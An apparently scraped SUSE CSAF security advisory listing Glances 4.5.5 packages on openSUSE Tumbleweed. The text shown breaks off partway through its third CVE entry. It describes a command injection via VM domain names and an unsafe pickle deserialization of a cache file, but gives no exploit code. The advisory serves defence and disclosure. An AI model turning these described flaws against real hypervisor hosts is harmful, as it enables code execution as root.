| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
